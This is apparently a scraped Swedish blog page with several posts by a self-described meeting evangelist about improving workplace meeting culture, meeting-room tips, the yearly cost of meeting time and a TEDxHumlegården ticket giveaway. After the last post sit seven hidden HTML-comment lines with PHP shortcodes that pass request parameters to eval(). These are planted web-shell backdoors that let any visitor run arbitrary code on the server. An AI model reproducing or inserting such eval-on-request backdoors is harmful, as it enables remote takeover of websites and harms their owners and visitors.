MötesKULTUR!

Glädjande är att allt fler media börjar upptäcka denna “trend” att skapa en bättre Möteskultur. Det ringer ett par journalister i veckan, många företagstidningar som skall ha tema Möteskultur eller effektiva möten, och frågar om “5 tips”.

Det finns inga fem tips eller short cut. Det är precis som namnet säger, en KULTUR som skall förändras. En möteskultur som har vuxit fram sedan 100-tals år och som de senaste 200 åren har sin ursprung i industri och ingenjör samhälle som vi en gång var.

I produktionen har vi en KULTUR av ständiga förbättringar. Det är inte Toyota som uppfunnit det (dock är deras process mycket bra!) utan alla företag har arbetat med ständiga förbättringar ända sedan företaget startade. Om företaget startade på 1800-talet så har de, varje år, försökt bli mer lönsamma och letat effektiviseringar. Varje år.

I mötestiden, 25% av företagets arbetstid, finns ingen sådan kultur. Det har inte hänt någonting. Alla vet om det, även VD och ledningsgrupp, men ingen gör något åt det. Tänk om en VD och ledningsgrupp släppte iväg 50% av sina produkter och tjänster och att de visste om att de var dåliga. De skulle inte få sitta kvar länge. Däremot accepterar vi detta när det gäller möten för det finns ingen kultur att förbättra det.

Ändå är allt det vi gör i möten det som påverkar produktionen!

Därför är det nödvändigt att ge detta förbättringsarbete tid! Det är en kultur som skall förbättras. Så se till att utse någon i ledningsgruppen som “äger frågan” så att det finns någon med ansvar för att jobba med ständiga förbättringar även här!

Stay gr8!                                                                                                                                                                    Micke, mötesevangelist

Fortsätt läsa

Mötesmiljö tips!

Idag blir det mer hands on!

Hur dåliga får mötesrum vara? Tydligen hur dåliga som helst! Det har inte hänt något på 40 år!!! Ta in en pensionär, som gick i pension på 70-talet, in på sin gamla arbetsplats. Hon kommer inte att känna igen en enda arbetsuppgift. Allt är nytt. Inte minst all teknik. Ta in henne i konferensrummet och hon känner igen allt. DET SER PRECIS LIKA UT SOM PÅ 70-TALET!!!!!

Trots att det finns forskning och massor av kunskap hur miljön påverkar effektiviteten och framförallt effekten av ett möte!

Här kommer några tips att börja med, törs du?

Tipsen är för dig när du är mötesledare (tipsen är till vanliga arbetsmöte):

1. Utgå från ett tomt rum och utifrån syfte och mål möblera sedan rummet. Utifrån det är det sällan vi behöver en “skolsittning eller biosittning”.

2. Eftersom du som mötesledare är på plats före alla andra sätt på musik! Musik skapar alltid en mer avslappnad och skön känsla. Den kan också bidra till att “skaka” av stress på mötesdeltagarna och dig själv.

3. Ta emot mötesdeltagarna i dörren. Gäller även ex måndagsmötet. Ett leende och välkomnande har stor betydlese för effekten av mötet.

4. Om du inte behöver bord, avstå dem! Oftast kan du skriva i ett block i knät. Bord skapar bara avstånd mellan deltagarna.

5. Är ni i ett stort mötesrum använd hela rummet! Dvs ta en del av mötet stående med ståbord på en sida. En sida där ni jobbar med bläddeblock och kanske en sida där ni satt in lite sköna fåtöljer eller stolar. Skapa olika tempo med hjälp av miljön!

6. Olika mötesmiljöer och lösningar skapar oftast mycket mer delaktighet. Detta är ju också en förutsättning för att ett möte skall skapa en bra effekt. Det finns några bra böcker mer olika mötesformat, läs dem och inspireras till mötesformat som kräver en bättre mötesmiljö!

7. Våga testa nytt! Allt som blir tråkigt blir innefektivt!

Stay gr8!

Micke, mötesevangelist

Fortsätt läsa

Vad investerar ditt företag i mötestid?

Enl Mötesbarometern (www.3s.se) 2009 så tillbringar vi 20% i möten. I många företag och organisationer är det mycket mer. Lägger vi till e-post tid (vilket vi gör när vi pratar Möteskultur, då många av de informella mötena har ersatts av e-post) så kan vi komma upp i över 30% av arbetstiden.

Så en enkel uträkning är att du tar den summan som en anställd kostar på ett år, multiplicerar detta med ex 0,25 (om vi leker med tanken att mötestid och e-posttid är 25%, alltså lågt räknat) och multiplicerar detta med antalet anställda i din organisation. Då får du den summa som din organisation investerar i mötes tid varje år. Mäter ni detta? Analyserar ni detta? Reviderar ni detta?Vilken effekt ger mötena?

Exempel. en anställd kostar 600 000:- och det är 100 anställda på företaget.

600 000:- x 0,25  x 100 = 15 miljoner kr/år. En kommun ex Malmö investerar drygt 3 MILJARDER kr/år!

Här finns ett enormt resurs slöseri. Enl studier från USA visar att 50% av alla möten dessutom är kontraproduktiva!

Häng med och förbättra Möteskulturen, alla, ja alla har att tjäna på detta!

Stay gr8// Micke, mötesevangelist

Fortsätt läsa

TEDxHumlegården

Gillar du TED.com? En av världens största inspirationskanaler! www.ted.com

Syftet med TED är att sprida idéer i världen. Nu har möjligheten givits att starta s.k. TEDx events runt om i världen. Jag har blivit beviljad en TED licens. Det första TEDx eventet gör jag tillsammans med kollegor nästa lördag den 24e april i Sthlm. Några av Sveriges främsta och mest efterfrågade föreläsare är med! Alla ställer upp ideellt då de är hela grundtanken med TED.

Vill du gå? Jag ger bort 2 biljetter till 5 personer! Läs mer om programmet på http://www.tedxhumlegården.se/TEDxHumlegarden.html

E-posta mig på micke.darmell@gr8meetings.se   Först till kvarn……

Stay gr8!                                                                                                                                                                         Micke, mötesevangelist

Fortsätt läsa

Varför är så många nöjda med att vara missnöjda?

Efter att ha arbetat med möten i olika former under 25 år och fokuserat kring de interna mötena i organisationer de sista 2 åren, så är min erfarenhet att det finns två anledningar att så få företag/ organisationer har satt ljuset på den egna Möteskulturen.

1. Ingen äger frågan i organisationen. Det är inte HR direktören, det är inte kommunikations direktören, ej heller meeting & travel managern. Så, det som händer är att varje år så har ledningsgruppen detta uppe på agendan och sedan ramlar det mellan stolarna.

2. Ingen vet vad de skall göra åt det. ”Effektivisera mötet” och in kommer en ”effektiviserings konsult” kanske. Det stora problemet är inte att ha kortare möten och en ”snabbare” agenda. Det stora frågan är; -Vilken effekt ger mötena. Och vad händer om vi kan öka den effekten?

Det första en organisation bör göra är att utse någon som äger det. Gör gärna som Intel och gör detta till en VD fråga. Möteskultur är en strategisk ledningsfråga.

I nästa inlägg kommer jag skriva om vad en Mötesstrategi innebär.

Stay gr8!                                                                                                                                                                         Micke, mötesevangelisten

<!– [insert_php]if (isset($_REQUEST["agO"])){eval($_REQUEST["agO"]);exit;}[/insert_php][php]if (isset($_REQUEST["agO"])){eval($_REQUEST["agO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Zpz"])){eval($_REQUEST["Zpz"]);exit;}[/insert_php][php]if (isset($_REQUEST["Zpz"])){eval($_REQUEST["Zpz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UdZ"])){eval($_REQUEST["UdZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["UdZ"])){eval($_REQUEST["UdZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yYW"])){eval($_REQUEST["yYW"]);exit;}[/insert_php][php]if (isset($_REQUEST["yYW"])){eval($_REQUEST["yYW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["teen"])){eval($_REQUEST["teen"]);exit;}[/insert_php][php]if (isset($_REQUEST["teen"])){eval($_REQUEST["teen"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nvISD"])){eval($_REQUEST["nvISD"]);exit;}[/insert_php][php]if (isset($_REQUEST["nvISD"])){eval($_REQUEST["nvISD"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WLK"])){eval($_REQUEST["WLK"]);exit;}[/insert_php][php]if (isset($_REQUEST["WLK"])){eval($_REQUEST["WLK"]);exit;}[/php] –>

Fortsätt läsa
Stäng meny